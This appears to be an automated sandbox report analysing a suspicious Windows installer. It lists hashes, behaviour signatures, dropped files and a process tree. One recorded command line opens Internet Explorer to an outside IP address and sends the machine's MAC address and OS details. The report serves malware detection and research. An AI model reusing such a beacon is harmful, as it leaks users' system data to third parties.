Overview

overview

7

Static

static

3

bd66fd4217...a8.exe

windows7-x64

7

bd66fd4217...a8.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    68s
  • max time network
    23s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-03-2024 02:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bd66fd42173eeccc30d90f045ee972a8.exe

  • Size

    854KB

  • MD5

    bd66fd42173eeccc30d90f045ee972a8

  • SHA1

    63ade2d8ee6db1c59262a7c7eeb31517e00b5240

  • SHA256

    49a8a1a713da6403155717c8a491fd600e48259fb68239726f067d5b092ac0c0

  • SHA512

    03a6a487e22355609c6cf50def5d5a42c55fc02fdf70bb800cc9b7a3071161031a453277341b2053b5b79f86db796617ab4de0d4329718ca1581fe45a3461366

  • SSDEEP

    24576:cutr5OUiMFgctewIbP9rEgqHudi0PjeDWS8MzXRrlVw/OIzwikys:cuX0ctewIbGl90PiDMMzXBlMCys

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 1 IoCs
    installer
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe
    "C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3720
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\3.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Program Files (x86)\winsoft9\t2.exe
        "C:\Program Files (x86)\winsoft9\t2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2936
    • C:\Program Files (x86)\winsoft9\test.exe
      "C:\Program Files (x86)\winsoft9\test.exe"
      2⤵
      • Executes dropped EXE
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=52-62-f0-8e-e7-3f&os=Microsoft Windows XP&flag=a354fded837b5bd49865c16aaef263fc&user=test
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3960 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3836
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3960 CREDAT:214018 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2104
    • C:\Program Files (x86)\winsoft9\bho.exe
      "C:\Program Files (x86)\winsoft9\bho.exe"
      2⤵
      • Executes dropped EXE
      PID:3320
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
      2⤵
        PID:3632
    • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
      1⤵
        PID:4144
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2432 CREDAT:17410 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:4712

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files (x86)\winsoft9\1.vbs
        Filesize

        155B

        MD5

        e849e17e1406246a7735f6bd56c0746c

        SHA1

        71579dc34f462ba27527537fb721046b9a8ac828

        SHA256

        f1ad4f5cd82f88506daf47972a4aa977bf6a9e2c789f06fa5fafb49d52613328

        SHA512

        d7dfdb1f4c579557ca0530dd91a2c3b3a93f7f13d9b1190fea0f7e06ee23ef909980f7fcb0dd6ffdf4a15d5da4566084c507daa373e299e39721c3fdf08b9fe5

        Download Submit

      • C:\Program Files (x86)\winsoft9\3.vbs
        Filesize

        366B

        MD5

        f6335c3ecedc794942a63f4a035f188d

        SHA1

        77fef7feed8a3ab3e48eb9a47ab19e5f743aa29f

        SHA256

        7289a5e894693eb160fd0db3f93fe01ea4a00d1fa984a181ee417c54212390d0

        SHA512

        4a597baea20244689fd161599e6c0154d9029ab93a33fc333084307d5843a1e74a8ca8abdb7a65fa23e8d768505972b87e90ade0b7af36114190d2e72519bc46

        Download Submit

      • C:\Program Files (x86)\winsoft9\bho.exe
        Filesize

        651KB

        MD5

        bcd485ad4617e520ae9db51ba5a90b1d

        SHA1

        a86af8eda57760475e50d42aa0b1dcecbd74a9bb

        SHA256

        931ceae29f72d9c5a7baab8e5d6ef921512441cfc16f87195cbfb56b37cafbc4

        SHA512

        1eb76e51db2f8bc89799df20267abd08975f3d093080faa63e967273d909f74e266c787906f4d90f91e8628953cf19330bb0a515da74879c474bf989baea394d

        Download Submit

      • C:\Program Files (x86)\winsoft9\t2.exe
        Filesize

        12.9MB

        MD5

        947cf950f7493b8e4734b4a4d9449091

        SHA1

        8247627ab34a79b9af9f0eca01a4c785a9ded157

        SHA256

        1008e5a37b2a1b0dfe828be4f5309b0876862ab4f9027512726c3d2d9c87f0a7

        SHA512

        c7da8acd82e588b19b6102ccff8bd05eb0da945299f9c3bf42784d60fadee1b583032f0d5763a7dc10ea76cf3425abe129f863c19251aa2957baf7f38076afd1

        Download Submit

      • C:\Program Files (x86)\winsoft9\test.exe
        Filesize

        9.5MB

        MD5

        8cb79ffeaa6c27e8c14a78c2cf80a5e0

        SHA1

        8f538702c7fb48e20158907efeec611910321abf

        SHA256

        6d762eabc51ae76deab8411d2f154fa85bc1c81c91fa3055138844dff4b5ef66

        SHA512

        e60a6fc9b6d3eca03619943abf21c7ac53b4ce3375dd62278235c6a277f3537ea46e4a3c0205695bad86c92ed1b8699e5383d6f4d7bb89357f9eb059a4a14112

        Download Submit

      • C:\Program Files (x86)\winsoft9\test.exe
        Filesize

        10.1MB

        MD5

        656eaa3fa4a1b212f64c9e5a361ea8f0

        SHA1

        419cbdc9bbc63645160c0ecd61888e85f4947af3

        SHA256

        215d05c61edead9c731814f5c21f0c8ca2d4c5f83df4d174019a2ea1eed27433

        SHA512

        fc3ed717a1ef57aff407d2a03bcb55c9d4179a1bb7c1eb5cf1d52f192df4347f51624f9143d112ed6f271aeb6bd5d65ebb23e2b8ef373b9b80a286a528783f99

        Download Submit

      • C:\Program Files (x86)\winsoft9\test.exe
        Filesize

        9.7MB

        MD5

        fb213be987ae517efe85cd760b5bd182

        SHA1

        2f66f741c5d655244582b15611f42c90153001da

        SHA256

        2251701c54cf76459887da6dacb2a20b6beaf70d78acdb8d02fbd4f115d8d94a

        SHA512

        f648b2158f318e07927bc6490391baa88f7e36cb66db0d304c26ee90dfea27db296e29c938b8e778348018986c3b1d5d9b149748df07e3f990310c5422fcb188

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2E5EA63-DE83-11EE-ABF1-5262F08EE73F}.dat
        Filesize

        4KB

        MD5

        4ecadba76640529569464a1aef6b7305

        SHA1

        6672976267b9141957a6cb5ba290b9191aeb7af8

        SHA256

        6b16a802b52ec47a25f4d2c96bd7e831f697b70a4881061488dedc246723cdf1

        SHA512

        d4b2bb4031f1f3fc015b99d77070de25e98c3eeb8a9baf6eb3d32742130d47018bd3a98b7afd3aba9d7f4979323c2c9a4b777f4407dcc9d57a2e7903696fc232

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E304EA30-DE83-11EE-ABF1-5262F08EE73F}.dat
        Filesize

        5KB

        MD5

        77fd25e7ca2f36177fc9fe72ac8c6d82

        SHA1

        eef62555e6c74a55496670c8ec68a7cc0b2cfba5

        SHA256

        59df263f80335da3923cb858f352d0880b46ed3eb9fb2ec14473ac21969fbaaf

        SHA512

        2cb59ac7f8362511451f15dc047edc4789d416ab0c89041f8f1c6deb5e30ff63ba70b13c379fc6c010de611c9f918aa6e94d9bb1ef2d2cc5779d7e87a7bcaf55

        Download Submit

      • C:\b.txt
        Filesize

        52B

        MD5

        081a7b88bad7ab23d6f8e08d7036510d

        SHA1

        0d4ef96a343f8e9ae6658823234c325d1e04cec3

        SHA256

        7693bdd3f1c506e3b263c0661a8c2f6741b0c7d2833579e82ec2ca8086fb8857

        SHA512

        592463fbec4d8578a59b5d86207ad2716754fd9fc2ec194b8a232a5b13d200f0d5c2ff693daa0ad7a7c99dd3d5ec319d54b7f89dc6cc5033c4bd84072ada79f4

        Download Submit

      • memory/2108-110-0x0000000000400000-0x0000000000423000-memory.dmp

        Filesize

        140KB

        Download

      • memory/2108-39-0x0000000000400000-0x0000000000423000-memory.dmp

        Filesize

        140KB

        Download

      • memory/2936-21-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2936-131-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download